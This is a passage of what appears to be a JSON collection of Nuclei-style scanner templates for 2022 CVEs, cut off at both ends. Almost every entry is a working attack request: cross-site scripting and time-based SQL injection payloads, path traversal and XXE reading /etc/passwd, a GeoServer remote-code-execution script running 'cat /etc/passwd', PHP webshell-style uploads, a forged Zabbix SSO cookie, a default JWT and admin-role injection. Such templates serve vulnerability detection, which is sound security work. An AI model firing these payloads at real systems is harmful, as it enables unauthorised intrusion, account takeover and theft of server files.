application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-32430","info":{"name":"Lin CMS Spring Boot - Default JWT Token","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/admin/group/all"],"headers":{"Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"level\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]},{"type":"word","part":"body","words":["<html","<body","<script"],"negative":true}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"or","matchers":[{"type":"dsl","name":"time-based","dsl":["duration_2>=6","status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")","contains(body_3, \"content\") && contains(body_3, \"{{Hostname}}\")","!contains(body_4, \"content\") && !contains(body_4, \"{{Hostname}}\")","len(body_3) > 200 && len(body_4) <= 22"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","part":"body_1","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-25148","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-45365","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Stock Ticker Fatal","<IMG SRC=X ONERROR="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3869","info":{"name":"Froxlor < 0.10.38.2. - HTML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The message to \"\"><h2>TEST</h2>\" failed"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39048","info":{"name":"ServiceNow - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /navpage.do HTTP/1.1\nHost: {{Hostname}}\n","POST /login.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do\n","GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["unwrapped_url = \"javascript:alert(document.domain)//assessment_take2.do\"","assessment_list.do"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"sysparm_ck\" id=\"sysparm_ck\" type=\"hidden\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3242","info":{"name":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\") && contains(tolower(body), \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-25568","info":{"name":"MotionEye Config Info 